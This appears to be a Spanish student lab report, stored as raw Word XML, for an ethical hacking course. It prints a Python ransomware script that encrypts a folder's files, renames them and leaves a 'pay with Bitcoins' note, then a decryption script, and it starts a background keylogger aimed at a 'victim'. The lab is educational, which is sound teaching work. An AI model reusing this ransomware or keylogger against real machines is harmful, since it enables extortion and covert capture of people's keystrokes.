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9A7E2" w14:textId="1BD57BD4" w:rsidR="007A185D" w:rsidRDefault="00F500CE">
      <w:r>
        <w:t>Laboratorio 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51330B0C" w14:textId="1C29E197" w:rsidR="00F500CE" w:rsidRDefault="00F500CE">
      <w:r>
        <w:t xml:space="preserve">ENCRIPTACIÓN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBBCC2A" w14:textId="4CCB4611" w:rsidR="006D4FE2" w:rsidRDefault="006D4FE2">
      <w:r>
        <w:t xml:space="preserve">En visual </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>studio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, creamos una nueva solución </w:t>
      </w:r>
      <w:r w:rsidR="00142603">
        <w:t>donde generaremos el código de encriptación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5136CD71" w14:textId="3C1EDE20" w:rsidR="00142603" w:rsidRDefault="00142603">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="073C4181" wp14:editId="2BBAE7C6">
            <wp:extent cx="5612130" cy="3156585"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="163016779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67794" name="Imagen 1" descr="Interfaz de usuario gráfica, Texto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FB9" w14:textId="7942B640" w:rsidR="008657BD" w:rsidRDefault="008657BD">
      <w:r>
        <w:t>Añadimos el</w:t>
      </w:r>
      <w:r w:rsidR="000C23BD">
        <w:t xml:space="preserve"> archivo de Python como un nuevo elemento </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3C60B7" w14:textId="2576DCDA" w:rsidR="000C23BD" w:rsidRDefault="000C23BD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C03669E" wp14:editId="05E945C2">
            <wp:extent cx="5612130" cy="3156585"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="2087009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09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17E" w14:textId="744C49A3" w:rsidR="00F500CE" w:rsidRDefault="00F500CE">
      <w:r>
        <w:t xml:space="preserve">Instalamos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>criptography</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="42C74BF3" w14:textId="72A936E5" w:rsidR="00302736" w:rsidRDefault="00302736">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60ABF1B7" wp14:editId="25371800">
            <wp:extent cx="5612130" cy="3156585"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="170503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5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DEAD" w14:textId="77777777" w:rsidR="00175C43" w:rsidRDefault="00175C43"/>
    <w:p w14:paraId="01D7C8A2" w14:textId="4C5D066B" w:rsidR="00F500CE" w:rsidRDefault="006E27DC">
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>continuación</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> el código realizado en clase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568BF86E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# -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C66CC0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46E4F5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###########################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CA515D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CifradoRansomwareJuanPabloLondoño</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67A025C3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###########################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D5A6E6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707F19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cryptography.fernet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import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94AA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Fernet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C8CF1B" w14:textId="77777777" w:rsidR="00794AA5" w:rsidRPr="005B2332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B233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import</w:t>
      </w:r>
      <w:r w:rsidRPr="005B233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B233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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00BDFD61" w14:textId="77777777" w:rsidR="00794AA5" w:rsidRPr="005B2332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AE190E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###########################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1903E503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756889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Extensión de los archivos secuestrados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44383A0E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extension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'IUEHackeoEtico202302'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C180AFF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6A9F4C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Generación de la llave de cifrado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726DE519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794AA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generar_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00794AA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key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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFADCA7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key = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00794AA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Fernet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.generate_</w:t>
      </w:r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EEFDFB0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with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key.key</w:t>
      </w:r>
      <w:proofErr w:type="spell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wb</w:t>
      </w:r>
      <w:proofErr w:type="spell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key_file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136547DE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key_</w:t>
      </w:r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file.write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(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F82DCD3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E67F0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Cargar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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la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llave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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generada</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22C64180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794AA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cargar_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00794AA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key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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACB80C7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key.key</w:t>
      </w:r>
      <w:proofErr w:type="spell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rb</w:t>
      </w:r>
      <w:proofErr w:type="spell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).read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C180B63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79BE8A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Cifrar y renombrar archivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568F8B59" w14:textId="77777777" w:rsid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cifrar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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE1BFA7" w14:textId="77777777" w:rsidR="00794AA5" w:rsidRPr="005B2332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B233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 = </w:t>
      </w:r>
      <w:r w:rsidRPr="005B2332">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Fernet</w:t>
      </w:r>
      <w:r w:rsidRPr="005B233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5B2332">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B2332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E826033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B233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items:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB1925D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Leo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el</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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archivo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3948F425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with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item,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rb</w:t>
      </w:r>
      <w:proofErr w:type="spell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file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECAFAAB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file_data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file.read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0BFF5A0D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2E55B9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encrypted_data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f.encrypt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file_data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 </w:t>
      </w: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# Changed 'encrypted' to 'encrypt'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329B9278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4ECD87" w14:textId="77777777" w:rsidR="00794AA5" w:rsidRPr="00FE54C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E54C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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE54C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Escribo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE54C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FE54C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archivo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B2F75E9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E54C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with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item,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wb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CB1229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file.write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encrypted_data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784704F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D55022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os.rename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(item, item +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'.'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 extension)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786FDC20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65CA52B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__name__ ==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'__main__'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5B39520A" w14:textId="4621FB81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path_to_encrypt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="00DA0CD0" w:rsidRPr="00DA0CD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'C:\Users\JuanPablo\Documents\HE\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DA0CD0" w:rsidRPr="00DA0CD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prueba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DA0CD0" w:rsidRPr="00DA0CD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="00DA0CD0"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</w:p>
    <w:p w14:paraId="410D275E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items =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os.listdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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path_to_encrypt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0AC23E8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full_path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[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os.path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.join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path_to_encrypt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item)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items]  </w:t>
      </w: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Used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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os.path.join</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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for path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EA3E31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0BF81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generar_</w:t>
      </w:r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19FB2AB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key = </w:t>
      </w:r>
      <w:proofErr w:type="spell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cargar_</w:t>
      </w:r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6963F3C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cifrar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full_path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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D04B6F8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BF73A" w14:textId="77777777" w:rsidR="00794AA5" w:rsidRPr="00794AA5" w:rsidRDefault="00794AA5" w:rsidP="00794A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with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path_to_encrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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'README.txt'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794AA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'w'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794AA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file:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00794AA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# Removed unnecessary '\\'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154CBA68" w14:textId="5F782936" w:rsidR="00794AA5" w:rsidRDefault="00794AA5" w:rsidP="00794AA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94AA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'Pague con Bitcoins'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5E1AAC0" w14:textId="77777777" w:rsidR="00794AA5" w:rsidRDefault="00794AA5" w:rsidP="00794AA5"/>
    <w:p w14:paraId="6BF2169F" w14:textId="46914D77" w:rsidR="00F500CE" w:rsidRDefault="006E27DC">
      <w:r>
        <w:t>En este apartado del código que se muestra a continuación se pone la dirección donde se va a encriptar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A50CBCC" w14:textId="720C3337" w:rsidR="006E27DC" w:rsidRDefault="006E27DC"/>
    <w:p w14:paraId="25D8384C" w14:textId="3E961491" w:rsidR="006E27DC" w:rsidRDefault="006E27DC">
      <w:r>
        <w:t>En la carpeta destino, ponemos archivos varios con el fin de probar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355EF248" w14:textId="436E2D41" w:rsidR="00DA7CD8" w:rsidRDefault="00DA7CD8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74CAF326" wp14:editId="146C6678">
            <wp:extent cx="5612130" cy="3156585"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="1315909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09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361A" w14:textId="520CC06E" w:rsidR="00C9241B" w:rsidRDefault="004945CF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E3F1BDE" wp14:editId="549EBAF3">
            <wp:extent cx="5612130" cy="3156585"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="17693060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0601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D90" w14:textId="48919559" w:rsidR="00DA0CD0" w:rsidRDefault="0000208E">
      <w:r>
        <w:t xml:space="preserve">Ejecutamos </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76539EAC" w14:textId="41C2751D" w:rsidR="0000208E" w:rsidRDefault="0000208E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C139E78" wp14:editId="1C5067DE">
            <wp:extent cx="5612130" cy="3156585"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="934768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6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C1EF" w14:textId="42AA1E46" w:rsidR="0000208E" w:rsidRDefault="00FA5224">
      <w:r>
        <w:t>Como se puede apreciar los archivos de la carpeta se han cifrado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27977656" w14:textId="12CB3DF8" w:rsidR="00FA5224" w:rsidRDefault="00FA5224">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A150599" wp14:editId="56387A2C">
            <wp:extent cx="5612130" cy="3156585"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="1911772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24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E47B" w14:textId="279E8CA2" w:rsidR="006E27DC" w:rsidRDefault="00FA5224">
      <w:r>
        <w:t>Ahora procederemos a hacer el descifrado</w:t>
      </w:r>
      <w:r w:rsidR="00961586">
        <w:t>, agregamos un nuevo elemento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C9622B" w14:textId="7A74C936" w:rsidR="00AC766A" w:rsidRDefault="00961586">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D58067D" wp14:editId="46745A47">
            <wp:extent cx="5612130" cy="3156585"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="520156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6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0787" w14:textId="7240EB17" w:rsidR="00732A98" w:rsidRDefault="00444832">
      <w:r w:rsidRPr="00444832">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F87BBD4" wp14:editId="553D9233">
            <wp:extent cx="3345470" cy="1737511"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="497168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874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5B98" w14:textId="7BE40CAC" w:rsidR="00FF2CF8" w:rsidRDefault="00934194">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76C70D8E" wp14:editId="0A41EC6D">
            <wp:extent cx="5612130" cy="3156585"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="719197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97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BEF3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# -*-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coding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: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB22D45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7F845D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###########################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7005A485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#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DescifradoRansomwareJuanPabloLondoñoQuintero</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23858020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###########################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5390FE33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74DBAA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cryptography.fernet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import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Fernet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1C139A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import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os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1228C4C1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10D05E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###########################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D167F17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166023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Extensión de los archivos secuestrados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C72DCD5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extension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'IUEHackeoEtico202302'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8EA11C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C77ED1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Cargar la clave de cifrado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47591B5A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0758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cargar_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030758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key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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407B1640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key.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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).read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1164D3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F55C8BF" w14:textId="77777777" w:rsidR="0030758A" w:rsidRPr="005B2332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B233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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B233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Descifrar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B233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y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B233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restaurar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B233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5B233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archivos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="090315EA" w14:textId="77777777" w:rsidR="0030758A" w:rsidRPr="005B2332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B233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</w:t>
      </w:r>
      <w:r w:rsidRPr="005B233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B233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descifrar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B233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5B233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items, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566C7345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B233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f = </w:t>
      </w:r>
      <w:r w:rsidRPr="0030758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Fernet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(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198EFFED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items:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFCE31E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Verificar si el archivo tiene la extensión adecuada para descifrar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A1BC56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item.endswith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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'.'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 extension):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC2D8D4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Leer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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el</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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archivo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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cifrado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A050F95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with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item, </w:t>
      </w:r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rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F33CDC7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encrypted_data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file.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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716A0E80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BB4215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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Descifrar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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archivo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="06E2E398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decrypted_data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f.decrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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encrypted_data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941E807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06F3C06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# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Restaurar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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archivo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0030758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original</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465E5FBC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original_name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os.path</w:t>
      </w:r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.splitext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(item)[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8B99EC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with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open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original_name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proofErr w:type="spellStart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wb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9CC3E1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decrypted_data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C138414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BEB7FA" w14:textId="77777777" w:rsid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# Eliminar el archivo cifrado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A4BAF4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os.remove</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(item)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A4E0E7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54FBF3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__name__ == </w:t>
      </w:r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'__main__'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5260B0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path_to_decrypt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'C:/Users/JuanPablo/Documents/HE/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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prueba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0030758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</w:p>
    <w:p w14:paraId="6653F762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items =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os.listdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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path_to_decrypt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E465453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full_path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[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os.path</w:t>
      </w:r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.join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path_to_decrypt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item)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 w:rsidRPr="0030758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items]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1DD94F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26676B" w14:textId="77777777" w:rsidR="0030758A" w:rsidRPr="0030758A" w:rsidRDefault="0030758A" w:rsidP="003075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key = </w:t>
      </w:r>
      <w:proofErr w:type="spell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cargar_</w:t>
      </w:r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key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67BDB8D" w14:textId="635A44CB" w:rsidR="006E27DC" w:rsidRDefault="0030758A" w:rsidP="0030758A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descifrar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full_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0030758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key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EF74ED" w14:textId="5F010CC6" w:rsidR="0030758A" w:rsidRDefault="00ED2755" w:rsidP="0030758A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Ejecutamos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D7E97EB" w14:textId="3D3E07FC" w:rsidR="00ED2755" w:rsidRDefault="00ED2755" w:rsidP="0030758A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FC5144F" wp14:editId="6908A5A1">
            <wp:extent cx="5612130" cy="3156585"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="69907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7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6AB" w14:textId="614E5279" w:rsidR="00A93946" w:rsidRDefault="00A93946" w:rsidP="0030758A">
      <w:r w:rsidRPr="009032BC">
        <w:t>Y se observa qu</w:t>
      </w:r>
      <w:r w:rsidR="009032BC" w:rsidRPr="009032BC">
        <w:t>e descifro c</w:t>
      </w:r>
      <w:r w:rsidR="009032BC">
        <w:t>orrectamente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D30572" w14:textId="11F3C8E5" w:rsidR="009032BC" w:rsidRDefault="009032BC" w:rsidP="0030758A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="506EBF06" wp14:editId="1CF630B6">
            <wp:extent cx="5612130" cy="3156585"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="4453742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4262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9C8E" w14:textId="5F4175DE" w:rsidR="00CD72AF" w:rsidRDefault="00CD72AF" w:rsidP="0030758A">
      <w:r>
        <w:t>KEYLOGGER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B44BF1D" w14:textId="34D6ADEF" w:rsidR="00A46F42" w:rsidRDefault="00E0145F" w:rsidP="0030758A">
      <w:r>
        <w:t xml:space="preserve">Haremos un programa que </w:t>
      </w:r>
      <w:r w:rsidR="00603469">
        <w:t>permita registrar cada una de las teclas accionadas en el equipo de nuestra victima</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBC8D24" w14:textId="5290DA73" w:rsidR="00973553" w:rsidRDefault="00973553" w:rsidP="0030758A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A193C4E" wp14:editId="44A9500C">
            <wp:extent cx="5612130" cy="3156585"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="66857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6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7CD0" w14:textId="5533FD34" w:rsidR="00603469" w:rsidRDefault="00973553" w:rsidP="0030758A">
      <w:r>
        <w:t xml:space="preserve">Para ello debemos instalar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pynput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B3C6063" w14:textId="348282CA" w:rsidR="00973553" w:rsidRDefault="00973553" w:rsidP="0030758A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DE03FAD" wp14:editId="7FC43467">
            <wp:extent cx="5612130" cy="1229995"/>
            <wp:effectExtent l="0" t="0" r="7620" b="8255"/>
            <wp:docPr id="19517031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3183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265D" w14:textId="3F2B7DF5" w:rsidR="008059C3" w:rsidRDefault="008059C3" w:rsidP="0030758A">
      <w:r w:rsidRPr="008059C3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="028BFAD2" wp14:editId="46BE9823">
            <wp:extent cx="5612130" cy="1238885"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="737332916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32916" name="Imagen 1" descr="Captura de pantalla con la imagen de una pantal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22D" w14:textId="1B57A30B" w:rsidR="00973553" w:rsidRDefault="00973553" w:rsidP="0030758A"/>
    <w:p w14:paraId="619E8C84" w14:textId="6991358D" w:rsidR="007F78CC" w:rsidRDefault="007F78CC" w:rsidP="0030758A">
      <w:r>
        <w:t>Una vez puesto el código, lo ejecutamos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15551DDD" w14:textId="5EE66E75" w:rsidR="00503D2D" w:rsidRDefault="00C37E5B" w:rsidP="0030758A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49285FB0" wp14:editId="166248B5">
            <wp:extent cx="5612130" cy="3156585"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="153929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3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97D9" w14:textId="52C5E1AC" w:rsidR="00C37E5B" w:rsidRDefault="00C37E5B" w:rsidP="0030758A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C6F5469" wp14:editId="1CE7C78D">
            <wp:extent cx="5612130" cy="3156585"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="19098122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12277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F794" w14:textId="1A06CD73" w:rsidR="0015627D" w:rsidRDefault="00086F8C" w:rsidP="0030758A">
      <w:r>
        <w:t xml:space="preserve">Ahora procedemos a </w:t>
      </w:r>
      <w:r w:rsidR="006961FF">
        <w:t>crear la aplicación para que funcione en segundo plano</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECCCF86" w14:textId="243AC0F1" w:rsidR="006961FF" w:rsidRDefault="006961FF" w:rsidP="0030758A">
      <w:r w:rsidRPr="006961FF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D089CDD" wp14:editId="4E76B6C8">
            <wp:extent cx="5479255" cy="1440305"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="2106377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77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8C6" w14:textId="13D055C1" w:rsidR="006961FF" w:rsidRDefault="00196EF9" w:rsidP="003075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68AC8" wp14:editId="32A5AC34">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>191819</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>237343</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="738554" cy="732693"/>
                <wp:effectExtent l="0" t="0" r="23495" b="10795"/>
                <wp:wrapNone/>
                <wp:docPr id="15981223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54" cy="732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89B2E" id="Rectángulo 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:15.1pt;margin-top:18.7pt;width:58.15pt;height:5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" filled="f" strokecolor="red" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007F4BFE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66EF9762" wp14:editId="003CE431">
            <wp:extent cx="5612130" cy="3156585"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="12717626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2676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2CC" w14:textId="7A2F8B94" w:rsidR="00196EF9" w:rsidRDefault="00196EF9" w:rsidP="0030758A">
      <w:r>
        <w:t xml:space="preserve">En el lado superior izquierdo vemos </w:t>
      </w:r>
      <w:r w:rsidR="00E93FB4">
        <w:t xml:space="preserve">que se </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E93FB4">
        <w:t>creo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E93FB4">
        <w:t xml:space="preserve"> satisfactoriamente </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
